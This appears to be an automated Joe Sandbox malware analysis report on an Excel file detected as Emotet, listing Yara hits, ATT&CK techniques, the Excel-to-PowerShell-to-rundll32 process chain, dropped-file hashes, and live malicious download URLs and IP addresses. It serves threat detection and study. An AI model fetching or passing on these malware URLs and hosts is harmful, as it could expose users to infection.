                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,12_2_1003F570
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetThreadLocale,GetLocaleInfoA,GetACP,12_2_10043730
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: _strcpy_s,__snprintf_s,GetLocaleInfoA,LoadLibraryA,12_2_10014B71
                            Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                            Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                            Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformationJump to behavior
                            Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003DAA7 cpuid 9_2_1003DAA7
                            Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003906D GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,9_2_1003906D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003CE1A __lock,__invoke_watson,__invoke_watson,__invoke_watson,____lc_codepage_func,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,__invoke_watson,__invoke_watson,9_2_1003CE1A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_100453C8 GetVersion,GetVersion,GetVersion,GetVersion,GetVersion,RegisterClipboardFormatA,9_2_100453C8

                            Stealing of Sensitive Information

                            Source: Yara matchFile source: 10.2.rundll32.exe.340000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.1b0000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.1b0000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.4b0000.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2410000.8.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2100000.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.29e0000.9.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.4b0000.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.2ed0000.11.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.2d0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.3180000.13.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.3110000.13.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.2910000.10.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2920000.8.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.180000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2e40000.10.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2870000.9.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.a00000.6.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 9.2.rundll32.exe.250000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2130000.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.970000.5.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.940000.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.2870000.8.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.23a0000.7.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2130000.4.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2370000.6.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2e10000.11.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.30e0000.12.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 9.2.rundll32.exe.250000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.300000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.340000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.3f0000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.220000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.2d0000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2c0000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.2870000.8.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2de0000.10.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 9.2.rundll32.exe.680000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.360000.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.4b0000.4.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.390000.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2de0000.10.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2790000.7.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.370000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.2650000.5.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2e70000.11.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.480000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.28e0000.9.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2410000.8.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.3110000.12.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2920000.8.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.1b0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.2910000.10.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.a00000.6.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.2730000.6.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.27b0000.7.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2e40000.10.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.4a0000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2c0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.2730000.6.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.30e0000.12.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.3110000.12.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.360000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.180000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.22f0000.5.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.4a0000.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.480000.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2370000.6.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.940000.4.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.10000000.12.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 9.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0000000F.00000002.679498941.0000000002E40000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.620421483.0000000002651000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.679023916.00000000004B1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.620926031.00000000030E0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000002.623757227.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.619911631.0000000000221000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.620976859.0000000003111000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.620028804.0000000000391000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.679099785.0000000000971000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.679434577.00000000029E1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.561150759.0000000002130000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.679378273.0000000002920000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.561065386.00000000004A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.684161589.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.561626313.0000000003110000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.561662235.0000000003181000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.561110360.0000000002101000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.560982656.0000000000371000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.620781732.0000000002910000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.563589206.00000000001B1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000002.623291568.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.561451631.0000000002871000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.561377294.0000000002410000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.620753571.00000000028E1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.563561570.0000000000180000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000002.623338464.0000000000301000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.563850517.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.561295967.00000000023A1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.679539755.0000000002E71000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.678957905.00000000003F1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.620558528.00000000027B1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.620134635.00000000004B0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.560945911.0000000000340000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.561541228.0000000002E11000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.561700746.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.619872548.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.679306140.0000000002791000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.679166369.0000000000A00000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.561513666.0000000002DE0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.678995791.0000000000480000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.678823543.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.561271615.0000000002370000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000002.504836959.0000000000250000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.621014524.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.620852430.0000000002ED1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.620492443.0000000002730000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.679074321.0000000000940000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.619980737.0000000000360000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.561230347.00000000022F1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.620621291.0000000002870000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match, File source: C:\ProgramData\JooSee.dll, type: DROPPED
                            Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
                            Execution: Scripting (21); Native API (1); Exploitation for Client Execution (13); Command and Scripting Interpreter (11); Service Execution (1); PowerShell (1); Scheduled Task; Command and Scripting Interpreter; PowerShell
                            Persistence: Windows Service (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job; At (Linux)
                            Privilege Escalation: Windows Service (1); Process Injection (11); Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job; At (Linux)
                            Defense Evasion: Disable or Modify Tools (1); Deobfuscate/Decode Files or Information (1); Scripting (21); Obfuscated Files or Information (2); Masquerading (2); Virtualization/Sandbox Evasion (1); Process Injection (11); Hidden Files and Directories (1); Rundll32 (1)
                            Credential Access: Input Capture (1); LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
                            Discovery: System Time Discovery (2); File and Directory Discovery (3); System Information Discovery (38); Security Software Discovery (21); Virtualization/Sandbox Evasion (1); Process Discovery (1); Application Window Discovery (1); Remote System Discovery (1); System Network Connections Discovery
                            Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Shared Webroot; Software Deployment Tools
                            Collection: Archive Collected Data (1); Email Collection (1); Input Capture (1); Clipboard Data (1); Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
                            Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
                            Command and Control: Ingress Tool Transfer (13); Encrypted Channel (1); Non-Application Layer Protocol (2); Application Layer Protocol (122); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
                            Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points; Downgrade to Insecure Protocols; Rogue Cellular Base Station
                            Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
                            Impact: Modify System Partition; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact; Generate Fraudulent Advertising Revenue; Data Destruction
                            Behavior Graph ID: 562418, Sample: CJ68000754184.xls, Startdate: 28/01/2022, Architecture: WINDOWS, Score: 100
                            Process chain: EXCEL.EXE started cmd.exe, which started mshta.exe, which started powershell.exe, which started cmd.exe, which started a chain of rundll32.exe processes.
                            Dropped files: C:\Users\user\Desktop\CJ68000754184.xls, Composite (EXCEL.EXE); C:\ProgramData\JooSee.dll, PE32 (powershell.exe); C:\Windows\...\wpnzacwyitgbmx.rxn (copy), PE32 (rundll32.exe)
                            DNS/IP: 129.232.188.93 xneeloZA South Africa; 162.214.50.39 UNIFIEDLAYER-AS-1US United States; 43 other IPs or domains; mshta.exe: 91.240.118.172, 49167, 49168, 80 GLOBALLAYERNL unknown; powershell.exe: hostfeeling.com 164.90.147.135, 80 DIGITALOCEAN-ASNUS United States and jurnalpjf.lan.go.id 103.206.244.105, 49170, 80 CEPATNET-AS-IDPTMoraTelematikaIndonesiaID Indonesia
                            Signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Multi AV Scanner detection for domain / URL; Found malware configuration; 16 other signatures; Powershell drops PE file (powershell.exe); Hides that the sample has been downloaded from the Internet (zone.identifier) (rundll32.exe)

                            Source: CJ68000754184.xls, Detection: 13%, Scanner: Virustotal
                            Source: CJ68000754184.xls, Detection: 19%, Scanner: ReversingLabs, Label: Document-Excel.Trojan.Emotet
                            Source: C:\ProgramData\JooSee.dll, Detection: 100%, Scanner: Joe Sandbox ML
                            Source: hostfeeling.com, Detection: 11%, Scanner: Virustotal
                            Source: jurnalpjf.lan.go.id, Detection: 1%, Scanner: Virustotal
                            http://bimesarayenovin.ir/wp-admin/G1pYGL/PE3100%Avira URL Cloudmalware
                            http://bimesarayenovin.ir/wp-admin/G1pYGL/100%Avira URL Cloudmalware
                            http://daisy.sukoburu-secure.com/8plks/v8lyZTe/PE3100%Avira URL Cloudmalware
                            http://91.240.118.172/gg/ff/fe.html100%Avira URL Cloudmalware
Name | IP | Active | Malicious | Antivirus Detection | Reputation
hostfeeling.com | 164.90.147.135 | true | true | - | unknown
jurnalpjf.lan.go.id | 103.206.244.105 | true | false | - | unknown
Name | Malicious | Antivirus Detection | Reputation
http://91.240.118.172/gg/ff/fe.png | true | Avira URL Cloud: malware | unknown
http://jurnalpjf.lan.go.id/assets/iM/ | true | Avira URL Cloud: malware | unknown
http://91.240.118.172/gg/ff/fe.html | true | Avira URL Cloud: malware | unknown
Joe Sandbox Version: 34.0.0 Boulder Opal
Analysis ID: 562418
Start date: 28.01.2022
Start time: 21:17:27
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 12m 8s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: CJ68000754184.xls
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed: 16
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.expl.evad.winXLS@21/9@2/48
EGA Information:
• Successful, ratio: 75%
HDC Information:
• Successful, ratio: 18.4% (good quality ratio 15.8%)
• Quality average: 66.5%
• Quality standard deviation: 32.2%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 58
• Number of non-executed functions: 197
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .xls
• Changed system and user locale, location and keyboard layout to English - United States
• Found Word or Excel or PowerPoint or XPS Viewer
• Attach to Office via COM
• Scroll down
• Close Viewer
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe
• Execution Graph export aborted for target mshta.exe, PID 2812 because there are no executed function
• Execution Graph export aborted for target powershell.exe, PID 2408 because it is empty
• Not all processes where analyzed, report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
21:18:22 | API Interceptor | 61x Sleep call for process: mshta.exe modified
21:18:25 | API Interceptor | 442x Sleep call for process: powershell.exe modified
21:19:08 | API Interceptor | 70x Sleep call for process: rundll32.exe modified
                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):548864
                                                                                                                    Entropy (8bit):6.980517956334168
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:12288:B2AavzUBPSczbeeTLjvWyMwWd3DYr6i64/:OUBPSczbeeTnvqZDWA
                                                                                                                    MD5:74D1C2A27C684005BDFCE89A1A5618B4
                                                                                                                    SHA1:033C28F6D209BA26560E472FEA70DDF740435EA0
                                                                                                                    SHA-256:34347D89E1A340EDC48F050CDDD15CB1E3B1702932887AEA3D97D0D0BFFE4DE8
                                                                                                                    SHA-512:E0A9010A2AAB912D48672F0DBD30E65664CAE4DA12B4E5444FB5AD8262E4099FFD08E15113871B3EA76EFA07F2F307319ACD699CE49F83CDF2C7734EBDE360A2
                                                                                                                    Malicious:true
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: C:\ProgramData\JooSee.dll, Author: Joe Security
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                    Process:C:\Windows\System32\mshta.exe
                                                                                                                    File Type:data
                                                                                                                    Category:downloaded
                                                                                                                    Size (bytes):11054
                                                                                                                    Entropy (8bit):6.200485074224619
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:192:aY5CkQ90FfYdjqQa2XdytMHsygv2nscEYD63lWAG7orUzAaENQaCBlm1Zhvkz29c:aY4kBBOjqQrXdHHsyg8sCr0UznQQasYS
                                                                                                                    MD5:DD20B97330028BCB6BF98D97C47028D9
                                                                                                                    SHA1:D58D97589A97FBD3B1216ED76C4918113F4B7B25
                                                                                                                    SHA-256:4E945D89F45065FBA3B3318DD8CB3EFF9991CB6F8038168D221B862810E84D21
                                                                                                                    SHA-512:AF4979B61257330E763B0C450575859D678F6950EF42783C87B2D9ED84130E4651CF58FBEF40E4C0BD3217B957A807337475F85C2610C24317C05DE98AC31A88
                                                                                                                    Malicious:false
                                                                                                                    IE Cache URL:http://91.240.118.172/gg/ff/fe.html
                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                    File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1536
                                                                                                                    Entropy (8bit):1.1464700112623651
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3:YmsalTlLPltl2N81HRQjlORGt7RQ//W1XR9//3R9//3R9//:rl912N0xs+CFQXCB9Xh9Xh9X
                                                                                                                    MD5:72F5C05B7EA8DD6059BF59F50B22DF33
                                                                                                                    SHA1:D5AF52E129E15E3A34772806F6C5FBF132E7408E
                                                                                                                    SHA-256:1DC0C8D7304C177AD0E74D3D2F1002EB773F4B180685A7DF6BBE75CCC24B0164
                                                                                                                    SHA-512:6FF1E2E6B99BD0A4ED7CA8A9E943551BCD73A0BEFCACE6F1B1106E88595C0846C9BB76CA99A33266FFEC2440CF6A440090F803ABBF28B208A6C7BC6310BEB39E
                                                                                                                    Malicious:false
                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                    File Type:data
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):28672
                                                                                                                    Entropy (8bit):3.5189161831469296
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:768:wvsk3hbdlylKsgqopeJBWhZFGkE+cMLxAAIZNSEVLG:w0k3hbdlylKsgqopeJBWhZFGkE+cMLx3
                                                                                                                    MD5:06A30014EFAE12913C829BE85DD271EC
                                                                                                                    SHA1:D19ADB2B308E5BC2C3E102DA72B2C22ADAF7563D
                                                                                                                    SHA-256:2ACF233FC4C70929CE7081E3F9C544AD26656E9AC8BC64B25AA9B0CCCABA05C9
                                                                                                                    SHA-512:E8BBC35960CC00962E744169521B702DD3C0B35BC248D4E3968DDCA9585BF21D0B43169F34EED7DF06426B4995E61653F5DD0F882F6F058FB6A010D708B0D279
                                                                                                                    Malicious:false
                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                    File Type:data
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):512
                                                                                                                    Entropy (8bit):0.0
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3::
                                                                                                                    MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                    SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                    SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                    SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                    Malicious:false
                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    File Type:data
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):8016
                                                                                                                    Entropy (8bit):3.5771325831414917
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:96:chQCcMqAqvsqvJCwoqz8hQCcMqAqvsEHyqvJCworAzIuYtHRUVh/lUV0A2:cidoqz8iFHnorAzI1UVhHA2
                                                                                                                    MD5:739473D4AA0429FF1319C5EB227EAAD3
                                                                                                                    SHA1:CA575798F0BD07E2CD11E918FE367D6E716CAF54
                                                                                                                    SHA-256:01ACBA9C38F360BBE15FA5B86E5C313A206BF0E68230FF1E40598E5144547DD2
